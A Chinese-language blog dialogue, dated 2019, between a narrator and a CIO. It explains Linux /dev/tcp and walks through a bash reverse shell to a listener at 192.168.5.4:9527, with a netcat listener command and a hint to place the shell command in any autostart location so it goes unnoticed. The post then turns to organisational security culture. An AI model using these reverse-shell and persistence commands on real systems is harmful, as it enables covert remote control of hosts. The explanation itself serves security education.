『在Linux的世界中，有一個特別的存在，像和人類世界中的一樣。這個存在，特別的地方是，我們看不見它，但它存在。』

「你要跟我討論哲學?」

『那有什好討論的? 我們看不見它，但它存在的事情，在人類世界中太多了。』

「重點...不要再廢話了。」

『像是/dev 這個資料夾裡面，是Linux對所有裝置的展現方式。』

「這我知道啊。」

『那 /dev/tcp 或 /dev/udp 妳找的到嗎?』

「我看一下......沒有耶...」

『對啊，但是這兩個位置是存在的。使用法方是 /dev/tcp/ip/port，比如 192.168.1.1的 9527port，就是/dev/tcp/192.168.1.1/9527。』

「那你剛問我的，ls > /dev/tcp/192.168.1.1/9527 ......就是說會把ls結果，轉送到 192.168.1.1的9527 port ?」

『是啊...有一個專有名詞，叫做 reverse shell，這個專有名詞的範圍，適用於CentOS裡的Bash Shell，在網路上有很多範例可以查，資訊長有空可以慢慢看...但，我們還是需要知道原理。

而原理，就是來自Streams。』

「原來是這樣...那問你，stdout和strderr 可以重新導向，stdint也可以重新導向嗎?」

『可以的，像是我們平常可能會用

cat filename | grep "sometext"，對吧?

也可以改成grep "somtext" < filename。』

「我還是不懂，這是重點嗎?」

『重點是，我們可以透過這樣的機制，讓使用者在操作系統時，將畫面轉送到我們指定的地方，或是，我們可以用這樣的方式，從遠端在符合規則的情況下，操作系統。』

「這是繞口令?」

『不是好嗎...是一種方法...』

「什麼方法? 滲透測試?」

『是啊，這是駭客使用的一種方法，也是許多資安認證會考出來的內容之一。』

「那你做一次我看看好了，體驗一下，是什麼樣的感覺。」

『好的，現在有兩台機器，一台叫做外部，一台叫做內部。

程序是

1.外部的主機，開起一個port，例如，9527 port。
nc -lvp 9527

2.內部先傳送一行指令看看，外部是否能收到。

#發送端將echo輸出，送到發動端#rsh_1 2 3 .png
*echo "Hello World" > /dev/tcp/192.168.5.4/9527

確定有收到之後，我們開始將內部所有的輸出，都轉到外部
#發送端將所有輸出，傳送到發動端#rsh_4.png
*bash -i > /dev/tcp/192.168.5.4/9527

可是這樣，有點麻煩...因為有可能，我人在外部，我根本沒機會操作到內部的主機，所以，我必需在第一次連線時，就要有辦法，可以在外部這台機器上，操控內部這台機器，因此，我需要修改一下我連線的方式

*bash -i > /dev/tcp/192.168.5.4/9527 0>&1 2>&1

然後，把這個指令，放到任何只能能起動的地方，只要起動，內部可以正常使用不會有任何感覺，外部也可正常使用，不會有任何感覺。

像下面畫面，下面視窗是外部，上面是窗是內部，外部與內部連線建立後，我就可以做我想做的事了。

』

「這會不會太誇張啊，不過為什麼都是Hello World啊? 」

『Hello World不是大家都在用的嗎?...這對那些駭客來說，是很普通的日常吧。另外，再說一件事...為什麼妳會允許妳的主機，可以執行這樣的script?』

「但是也...」

『資訊長，百分之80的資安事件，來知於百分之20的未知手法...妳該擔心的是什麼? 那剩下百分之20的資安事件，妳有沒有辦法防範吧。』

「也對，但我是資訊長，我們資訊部門最重要的目標，是系統要穩定，而且是持續性穩定。我又不是資安部門的...我管他那麼多...就好像資安部門，也不會管我們，到底行不行，或是為了要符合什麼policy，我們必需要調整，調整完之後，系統不穩定，又全都是資訊部門的責任，你說，這到底是為了什麼?」

『為了......等等多喝一杯咖啡吧，誰知道...不過，應該這樣說，如果發生資安事件，嚴重到是否還能經營的那種層面，我想...妳再堅持，妳是資訊長，妳的資訊部門重要目標，也沒什麼意義了。

資訊安全，本身不就是為了組織或企業，要能持續營運，才制定出來的嗎? 為了幫助協助妳口中的，持續性穩定，制定出了資訊安全政策...主角還是資訊部門啊，只是我不懂，為什麼有了資安部門之後，資訊部門就像小媳婦一樣，台灣的環境還滿妙的。』

「是這樣嗎?」

『不是嗎? 資訊長，想清楚資訊安全的本質，為什麼會有資訊安全政策。』

「你又在唬我?」

『以前，台北市萬華區西昌街，有一棟樓，是某間銀行的機房，當時，要進到機房裡面，需在樓下櫃台換證件，那櫃台的警衛，口氣差到不行，態度差到每個去換證的人，都好像欠他們警衛公司幾億這樣。

然後，會有聯絡人到櫃台帶人上樓，上樓到機房後，要再登記一次。進到機房後，會有隨行人員，站在你旁邊，緊緊盯著你，看你在幹嘛。』

「這很正常啊...」

『不好意思，後來，那間銀行消失在台灣了，但那棟樓還在，現在是不知道幹嘛的店...出入根本不用登記，可不對啊，以前不是這樣子耶...以前都很講資安，很講ISO啊...現在呢...』

「你這不是廢話嗎? 那銀行都沒了，是要什麼.......................我講不過你，我喝咖啡...對了，還有那個什麼和什麼....，你也順便講一下吧。」

(待)

2019/09/28 SunAllen